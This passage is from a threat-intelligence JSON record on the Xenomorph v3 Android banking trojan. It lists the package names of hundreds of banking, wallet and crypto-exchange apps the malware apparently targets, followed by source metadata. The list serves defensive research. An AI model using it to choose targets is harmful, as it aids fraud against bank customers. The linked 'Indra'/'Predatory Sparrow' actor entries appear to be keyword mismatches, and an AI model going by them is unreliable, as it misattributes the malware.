bank\r\ncom.indra.itecban.mobile.novobanco NBapp Spain\r\ncom.indra.itecban.triodosbank.mobile.banki -\r\ncom.indra.itecban.triodosbank.mobile.banking Triodos Bank. 
Banca Móvil\r\ncom.infonow.bofa Bank of America Mobile Banking\r\ncom.infosys.alh Al Hilal Mobile Banking App\r\ncom.infrasofttech.CentralBank Cent Mobile\r\ncom.infrasofttech.MahaBank Maha Mobile\r\ncom.ing.banking ING Banking\r\ncom.ing.mobile ING Bankieren\r\ncom.ingbanktr.ingmobil ING Mobil\r\ncom.ininal.wallet ininal Wallet\r\ncom.interswitchng.www Fidelity Online Banking\r\ncom.intertech.mobilemoneytransfer.activity fastPay\r\ncom.isbank.isyerim Maximum İşyerim\r\ncom.isis_papyrus.hypo_pay_eyewdg HYPO Mein ELBA-App\r\ncom.itau Banco Itaú: Gerencie sua conta pelo celular\r\ncom.kasikorn.retail.mbanking.wap K PLUS\r\ncom.kbc.mobile.android.phone.kbc KBC Mobile\r\ncom.key.android KeyBank Mobile\r\ncom.konylabs.HongLeongConnect Hong Leong Connect Mobile Banking\r\ncom.konylabs.capitalone Capital One® Mobile\r\ncom.konylabs.cbplpat Citi Handlowy\r\ncom.kraken.trade Pro: Advanced Bitcoin \u0026 Crypto Trading\r\ncom.kubi.kucoin KuCoin: Bitcoin Exchange \u0026 Crypto Wallet\r\ncom.kutxabank.android Kutxabank\r\ncom.kuveytturk.mobil Kuveyt Türk\r\ncom.latuabancaperandroid Intesa Sanpaolo Mobile\r\ncom.leumi.leumiwallet לאומי\r\ncom.lumiwallet.android Lumi Crypto and Bitcoin Wallet\r\ncom.lynxspa.bancopopolare YouApp\r\ncom.magiclick.odeabank Odeabank\r\ncom.mbanking.ajmanbank Ajman Bank\r\ncom.mcom.firstcitizens First Citizens Mobile Banking\r\ncom.mediolanum.android.fullbanca Mediolanum\r\ncom.mediolanum Banco Mediolanum España\r\ncom.meridian.android Meridian Mobile Banking\r\ncom.mfoundry.mb.android.mb_136 People’s United Bank Mobile\r\ncom.mobikwik_new BHIM UPI, Money Transfer, Recharge \u0026 Bill Payment\r\ncom.mobileloft.alpha.droid myAlpha Mobile\r\ncom.mobillium.papara Papara\r\ncom.mootwin.natixis My 
Savings\r\ncom.morganstanley.clientmobile.prod Morgan Stanley Wealth Mgmt\r\ncom.msf.kbank.mobile Kotak - 811 \u0026 Mobile Banking\r\ncom.mtb.mbanking.sc.retail.prod M\u0026T Mobile Banking\r\ncom.mycelium.wallet Mycelium Bitcoin Wallet\r\ncom.navyfederal.android Navy Federal Credit Union\r\ncom.ocbc.mobilemy OCBC Malaysia Mobile Banking\r\ncom.ocito.cdn.activity.banquelaydernier Banque Laydernier - Mobile\r\ncom.ocito.cdn.activity.creditdunord Crédit du Nord pour Mobile\r\ncom.okinc.okcoin.intl Okcoin - Buy \u0026 Trade Bitcoin, Ethereum, \u0026 Crypto\r\ncom.okinc.okex.gp OKEx - Bitcoin/Crypto Trading Platform\r\ncom.oxigen.oxigenwallet Bill Payment \u0026 Recharge,Wallet\r\ncom.paribu.app Paribu\r\ncom.pcfinancial.mobile Simplii Financial\r\ncom.plunien.poloniex Poloniex Crypto Exchange\r\ncom.pnc.ecommerce.mobile PNC Mobile\r\ncom.pozitron.iscep İşCep - Mobile Banking\r\ncom.pozitron.qib QIB Mobile\r\ncom.pttfinans PTTBank\r\ncom.quoine.quoinex.light Liquid by Quoineライト版（リキッドバイコイン） -ビットコインなどの仮想通貨取引所\r\ncom.rak RAKBANK Digital Banking\r\ncom.rbc.mobile.android RBC Mobile\r\ncom.rsi.Colonya Colonya Caixa Pollença\r\ncom.rsi ruralvía\r\ncom.s4m EI Bank\r\ncom.samba.mb SambaMobile\r\ncom.samourai.wallet Samourai Wallet\r\ncom.sbi.SBAnywhereCorporate SBI Anywhere Corporate\r\ncom.sbi.SBIFreedomPlus Yono Lite SBI - Mobile Banking\r\ncom.scb.ae.bmw SC Mobile Banking (UAE)\r\ncom.schwab.mobile Schwab Mobile\r\ncom.sella.BancaSella Banca Sella\r\ncom.shaketh Shakepay: Buy Bitcoin Canada\r\ncom.sib.retail SIB Digital\r\ncom.snapwork.IDBI IDBI Bank GO Mobile+\r\ncom.snapwork.hdfc HDFC Bank MobileBanking\r\ncom.starfinanz.smob.android.sfinanzstatus Sparkasse Ihre mobile Filiale\r\ncom.suntrust.mobilebanking SunTrust Mobile App\r\ncom.tabtrader.android TabTrader Buy Bitcoin and Ethereum on exchanges\r\ncom.targo_prod.bad TARGOBANK 
Mobile Banking\r\ncom.targoes_prod.bad TARGOBANK - Banca a distancia\r\ncom.tarjetanaranja.emisor.serviciosClientes.appTitulares Naranja\r\ncom.td TD Canada\r\ncom.tdbank TD Bank (US)\r\ncom.teb CEPTETEB\r\ncom.teb.kurumsal CEPTETEB İŞTE\r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa\r\ncom.tfkb Türkiye Finans Mobile Branch\r\ncom.tmobtech.halkbank Halkbank Mobil\r\ncom.todo1.davivienda.mobileapp Davivienda Móvil\r\ncom.todo1.mobile Bancolombia App Personas\r\ncom.uab.personal United Arab Bank Mobile\r\ncom.unicredit Mobile Banking UniCredit\r\ncom.unocoin.unocoinwallet Unocoin Wallet\r\ncom.usaa.mobile.android.usaa USAA Mobile\r\ncom.usbank.mobilebanking U.S. Bank - Inspired by customers\r\ncom.uy.itau.appitauuypf Itaú Uruguay\r\ncom.vakifbank.mobile VakıfBank Mobil Bankacılık\r\ncom.vakifkatilim.mobil Mobile Branch\r\ncom.vancity.mobileapp Vancity\r\ncom.vanso.gtbankapp GTBank\r\ncom.vipera.chebanca CheBanca!\r\ncom.vipera.nbf NBF Direct App\r\ncom.vipera.ts.starter.MashreqAE Mashreq UAE\r\ncom.vtb.mobilebank VTB Mobile Georgia\r\ncom.wf.wellsfargomobile Wells Fargo Mobile\r\ncom.woodforest Woodforest Mobile Banking\r\ncom.wrx.wazirx WazirX - Buy Sell Bitcoin \u0026 Other Cryptocurrencies\r\ncom.ykb.android Yapı Kredi Mobile\r\ncom.zellepay.zelle Zelle\r\ncom.ziraat.ziraatmobil Ziraat Mobile\r\ncom.ziraatkatilim.mobilebanking Katılım Mobil\r\ncom.zoluxiones.officebanking Banco Santander Perú S.A.\r\ncoop.bancocredicoop.bancamobile Credicoop Móvil\r\ncz.csob.smartbanking ČSOB Smartbanking\r\nde.comdirect.android comdirect mobile App\r\nde.comdirect.app comdirect\r\nde.commerzbanking.mobil Commerzbank Banking - The app at your side\r\nde.consorsbank Consorsbank\r\nde.dkb.portalapp 
DKB-Banking\r\nde.fiducia.smartphone.android.banking.vr VR Banking Classic\r\nde.ingdiba.bankingapp ING Banking to go\r\nde.number26.android N26 — The Mobile Bank\r\nde.postbank.finanzassistent Postbank Finanzassistent\r\nde.santander.presentation Santander Banking\r\nde.sdvrz.ihb.mobile.app SpardaApp\r\nde.sdvrz.ihb.mobile.secureapp.sparda.produktion SpardaSecureApp\r\nde.traktorpool tractorpool\r\ndk.nordea.mobilebank Nordea Mobile - Denmark\r\ndoge.org.freewallet.app Dogecoin Wallet. Store \u0026 Exchange DOGE coin\r\nenbd.mobilebanking Emirates NBD\r\nes.bancosantander.apps Santander\r\nes.bancosantander.empresas Santander Empresas\r\nes.caixagalicia.activamovil ABANCA- Banca Móvil\r\nes.caixageral.caixageralapp Banco Caixa Geral España\r\nes.caixaontinyent.caixaontinyentapp Caixa Ontinyent\r\nes.ceca.cajalnet Cajalnet\r\nes.cecabank.ealia2103appstore UniPay Unicaja\r\nes.cm.android Bankia\r\nes.evobanco.bancamovil EVO Banco móvil\r\nes.ibercaja.ibercajaapp Ibercaja\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\nes.liberbank.cajasturapp Banca Digital Liberbank\r\nes.openbank.mobile Openbank – banca móvil\r\nes.orangebank.app Orange Bank - Banco Móvil\r\nes.pibank.customers Pibank\r\nes.santander.Criptocalculadora Criptocalculadora\r\nes.unicajabanco.app Unicaja Banco\r\nes.univia.unicajamovil UnicajaMovil\r\neu.afse.omnia.attica Attica Mobile\r\neu.atlantico.bancoatlanticoapp MY ATLANTICO\r\neu.eleader.mobilebanking.abk ABK Mobile Banking\r\neu.eleader.mobilebanking.invest plusbank24\r\neu.eleader.mobilebanking.nbk NBK Mobile Banking\r\neu.eleader.mobilebanking.pekao Pekao24Makler\r\neu.netinfo.colpatria.system Scotiabank Colpatria\r\neu.unicreditgroup.hvbapptan HVB Mobile Banking\r\nfinansbank.enpara Enpara.com Cep Şubesi\r\nfinansbank.enpara.sirketim Enpara.com Şirketim Cep Şubesi\r\nfr.banquepopulaire.cyberplus Banque 
Populaire\r\nfr.bred.fr BRED\r\nfr.creditagricole.androidapp Ma Banque\r\nfr.lcl.android.customerarea Mes Comptes - LCL\r\nge.bog.mobilebank BOG mBank - Mobile Banking\r\nge.lb.mobilebank Liberty\r\nge.mobility.basisbank BasisBank\r\ngr.co.hsbc.hsbcgr HSBC Greece\r\ngr.winbank.mobilenext Winbank Mobile\r\nhr.asseco.android.intesa.isbd.cib CIB Bank\r\nhr.asseco.android.jimba.mUCI.hu UniCredit Mobile Application\r\nhu.bb.mobilapp Budapest Bank Mobil App\r\nhu.cardinal.cib.mobilapp CIB Business Online\r\nhu.cardinal.erste.mobilapp Erste Business MobilBank\r\nhu.khb K\u0026H mobilbank\r\nhu.mkb.mobilapp MKB Mobilalkalmazás\r\nhu.otpbank.mobile OTP Bank HU\r\nid.co.bitcoin Indodax\r\nil.co.yahav.mobbanking בנק יהב - ניהול חשבון\r\nil.co.yellow.app מבצעים והטבות עם הארנק הדיגיטלי – yellow של פז!\r\nio.metamask MetaMask - Buy, Send and Swap Crypto\r\nit.bcc.iccrea.mycartabcc myCartaBCC\r\nit.bnl.apps.banking BNL\r\nit.carige Carige Mobile\r\nit.copergmps.rt.pf.android.sp.bmps Banca MPS\r\nit.creval.bancaperta Bancaperta\r\nit.hype.app Hype\r\nit.icbpi.mobile Nexi Pay\r\nit.ingdirect.app ING Italia\r\nit.nogood.container UBI Banca\r\nit.popso.SCRIGNOapp SCRIGNOapp\r\njp.co.aeonbank.android.passbook イオン銀行通帳アプリ かんたんログイン＆残高・明細の確認\r\njp.co.netbk 住信SBIネット銀行\r\njp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ\r\njp.co.smbc.direct 三井住友銀行アプリ\r\njp.coincheck.android Bitcoin Wallet Coincheck\r\nktbcs.netbank Krungthai NEXT\r\nlt.spectrofinance.spectrocoin.android.wallet Bitcoin Wallet by SpectroCoin\r\nma.gbp.pocketbank Pocket Bank\r\nmbanking.NBG NBG Mobile Banking\r\nmobi.societegenerale.mobile.lappli L’Appli Société Générale\r\nmx.bancosantander.supermovil Santander móvil\r\nmx.hsbc.hsbcmexico HSBC México\r\nmy.com.hsbc.hsbcmalaysia HSBC 
Malaysia\r\nmy.com.maybank2u.m2umobile Maybank2u MY\r\nnet.bitbay.bitcoin Bitcoin \u0026 Crypto Exchange - BitBay\r\nnet.bitstamp.app Bitstamp – Buy \u0026 Sell Bitcoin at Crypto Exchange\r\nnet.bnpparibas.mescomptes Mes Comptes BNP Paribas\r\nnet.garagecoders.e_llavescotiainfo ScotiaMóvil\r\nnet.inverline.bancosabadell.officelocator.android Banco Sabadell App. Your mobile bank\r\nnz.co.anz.android.mobilebanking ANZ goMoney New Zealand\r\nnz.co.asb.asbmobile ASB Mobile Banking\r\nnz.co.kiwibank.mobile Kiwibank Mobile Banking\r\nnz.co.westpac Westpac One (NZ) Mobile Banking\r\norg.banking.bom.businessconnect Bank of Melbourne Business App\r\norg.banking.bsa.businessconnect BankSA Business App\r\norg.banking.stg.businessconnect St.George Business App\r\norg.banksa.bank BankSA Mobile Banking\r\norg.bom.bank Bank of Melbourne Mobile Banking\r\norg.microemu.android.model.common.VTUserApplicationLINKMB Link Celular\r\norg.ncsecu.mobile SECU\r\norg.stgeorge.bank St.George Mobile Banking\r\norg.westpac.bank Westpac Mobile Banking\r\norg.westpac.col Westpac Corporate Mobile\r\npaladyum.peppara PeP: Para Transferi Sanal Kart\r\npe.com.interbank.mobilebanking Interbank APP\r\npe.com.scotiabank.blpm.android.client Scotiabank Perú\r\npe.pichincha.bm APP Banco Pichincha Perú\r\npegasus.project.ebh.mobile.android.bundle.mobilebank George Magyarország\r\npiuk.blockchain.android Blockchain Wallet. 
Bitcoin, Bitcoin Cash, Ethereum\r\npl.aliorbank.aib Alior Mobile\r\npl.allegro Allegro - convenient and secure online shopping\r\npl.bph BusinessPro Lite\r\npl.bps.bankowoscmobilna BPS Mobilnie\r\npl.bzwbk.bzwbk24 Santander mobile\r\npl.ceneo Ceneo - zakupy i promocje\r\npl.com.rossmann.centauros Rossmann PL\r\npl.envelobank.aplikacja Pocztowy\r\npl.fakturownia Fakturownia.pl\r\npl.ideabank.mobilebanking Idea Bank PL\r\npl.ifirma.ifirmafaktury IFIRMA - Darmowy Program do Faktur\r\npl.ing.mojeing Moje ING mobile\r\npl.mbank mBank PL\r\npl.nestbank.nestbank Nest Bank nowy\r\npl.noblebank.mobile Noble Mobile\r\npl.orange.mojeorange Mój Orange\r\npl.pkobp.iko IKO\r\npl.raiffeisen.nfc Mobilny Portfel\r\npl.sgb.wallet PORTFEL SGB\r\nposteitaliane.posteapp.appbpol BancoPosta\r\nposteitaliane.posteapp.apppostepay Postepay\r\npt.bancobest.android.mobilebanking Best Bank\r\npt.bancobpi.mobile.fiabilizacao BPI APP\r\npt.bctt.appbctt Banco CTT\r\npt.cgd.caixadirectaempresas Caixadirecta Empresas\r\npt.novobanco.nbapp NB smart app\r\npt.santandertotta.mobileempresas Santander Empresas\r\npt.santandertotta.mobileparticulares Santander Particulares\r\npt.sibs.android.mbway MB WAY\r\nsoftax.pekao.powerpay PeoPay\r\ntr.com.abank.dijital Alternatif Bank Mobil\r\ntr.com.hsbc.hsbcturkey HSBC Turkey\r\ntr.com.hsbc.hsbcturkey.uk HSBC Turkiye\r\ntr.com.param.android Param\r\ntr.com.sekerbilisim.mbank ŞEKER MOBİL ŞUBE\r\ntr.gov.turkiye.edevlet.kapisi e-Devlet Kapısı\r\ntrendyol.com Trendyol - Hızlı ve Güvenli Alışverişin Yolu\r\ntsb.mobilebanking TSB Bank Mobile Banking\r\nuy.brou App Móvil del Banco República\r\nuy.com.brou.token BROU Llave Digital\r\nwit.android.bcpBankingApp.activoBank ActivoBank\r\nwit.android.bcpBankingApp.millennium Millenniumbcp\r\nwit.android.bcpBankingApp.millenniumPL Bank Millennium\r\nwww.ingdirect.nativeframe ING España. 
Banca Móvil\r\nSource: https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html"
	],
	"report_names": [
		"xenomorph-v3-new-variant-with-ats.html"
	],
	"threat_actors": [
		{
			"id": "8309f9cf-9abb-4ce3-aa1e-cda7d7f5c1b3",
			"created_at": "2022-10-25T16:07:23.729215Z",
			"updated_at": "2026-04-10T02:00:04.729076Z",
			"deleted_at": null,
			"main_name": "Indra",
			"aliases": [],
			"source_name": "ETDA:Indra",
			"tools": [
				"Stardust"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8d28f58b-5ea2-4450-a74a-4a1e39caba6e",
			"created_at": "2026-03-16T02:02:50.582318Z",
			"updated_at": "2026-04-10T02:00:03.777263Z",
			"deleted_at": null,
			"main_name": "COASTLIGHT",
			"aliases": [
				"Gonjeshke Darande",
				"Indra",
				"Predatory Sparrow"
			],
			"source_name": "Secureworks:COASTLIGHT",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "219ddb41-2ea8-4121-8b63-8c762f7e15df",
			"created_at": "2023-01-06T13:46:39.384442Z",
			"updated_at": "2026-04-10T02:00:03.309654Z",
			"deleted_at": null,
			"main_name": "Predatory Sparrow",
			"aliases": [
				"Indra",
				"Gonjeshke Darande"
			],
			"source_name": "MISPGALAXY:Predatory Sparrow",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434304,
	"ts_updated_at": 1775792119,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311.pdf",
		"text": "https://archive.orkl.eu/d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311.txt",
		"img": "https://archive.orkl.eu/d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311.jpg"
	}
}